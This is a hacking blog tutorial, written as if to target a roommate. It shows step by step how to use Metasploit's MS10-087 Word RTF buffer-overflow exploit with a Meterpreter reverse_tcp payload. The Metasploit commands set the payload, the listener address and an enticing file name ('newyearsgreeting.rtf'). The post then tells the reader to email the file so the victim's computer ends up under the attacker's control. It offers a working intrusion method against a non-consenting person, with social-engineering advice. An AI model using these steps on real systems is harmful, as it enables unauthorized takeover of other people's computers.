Exploit MS Word to Embed a Listener on

Your Roommate's Computer

 By occupytheweb
 12/21/2012 1:20 am
 Listeners

In my last hack blog on crashing your roommates Win7 system, we started looking at client-
side attacks. As promised, we will be looking at some more client-side attacks.

As web server and OS's have become hardened and living behind significant perimeter
defenses, hackers have migrated to the easiest route to the pot of gold. This is through the
often unpatched, unhardened client-side system with little in the way of defenses and a
plethora of vulnerable software, including the ubiquitous Microsoft Office products.

This hack will work on the Word 2007 or Word 2010. It exploits a buffer overflow in Word
to allow us to plant a listener on our target system. I'm assuming that you have the victim's IP
address and have verified the Microsoft Office is running (a good assumption, but its better to
verify).

Step 1Start Metasploit

So, let fire up Metasploit and find the
exploit/windows/fileformat/ms10_087_rtf_pfragments_bof. Now, set Metasploit to use this
exploit by typing:

msf >use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

Step 2Set a Payload
Then we need to set a payload. In this case, we wish to use Metasploit's powerful Meterpreter
to establish a listener on the victim's system.

msf exploit( ms10_087_rtf_pfragments_bof) > set payload

windows/meterpreter/reverse_tcp
Step 3Show Options
Now, let's look at our options. As you know from my previous Metasploit blogs, every
exploit has options, some mandatory and some not. Let's take a look at the options for this
exploit by typing

msf >show options

Step 4Change FILENAME
We can see from the screenshot above that Metasploit has a number of options for this
exploit. First, we are creating a .rtf file and Metasploit gives it a default name of FILENAME.
Let's change that name to something more inviting to our victim, such as newyearsgreeting.rtf

msf >set FILENAME newyearsgreeting.rtf

Step 5Set Your Local Host

Next we need to set the LHOST or the local host. This will be the system we will be listening
from--usually our local system--but it could be any system you want to listen from. We
simply need to set the LHOST with the IP address of our listening system, in this case
192.168.1.100.

msf> set LHOST 192.168.1.100

Step 6Last Check of Options

Before we exploit the victim's system, let's check to make sure all our options are set
properly.

msf> show options

Note in the screenshot that the FILENAME is now set to newyearsgreeting.rtf and the
LHOST is 192.168.1.100.

Step 7Exploit
Now, we are ready to exploit. Simply type:

msf > exploit

You can see that Metasploit has generated a file called newyearsgreeting.rtf and placed it at
/root/.msf4/local/newyearsgreeting.rtf.

Step 8Send the File to the Victim

Now we need to send this file to the victim through email or other method. Once the victim
opens the file, the Word application will hang or crash leaving us with an active session of
Meterpeter on the victim's system. With an active Meterpreter session on the victim's system,
we have nearly total control or "own" their system.

Want to start making money as a white hat hacker? Jump-start your hacking career with
our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte
Shop and get over 60 hours of training from cybersecurity professionals.